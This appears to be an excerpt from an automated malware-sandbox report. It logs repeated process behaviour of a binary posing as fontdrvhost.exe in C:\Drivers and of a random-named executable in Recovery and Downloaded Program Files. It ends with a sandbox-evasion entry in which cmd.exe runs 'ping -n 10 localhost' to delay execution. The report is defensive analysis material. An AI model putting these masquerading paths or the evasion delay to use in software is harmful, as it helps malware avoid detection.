Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Drivers\fontdrvhost.exe	Memory allocated: 1380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Memory allocated: 1B160000 memory reserve \| memory write watch	Jump to behavior
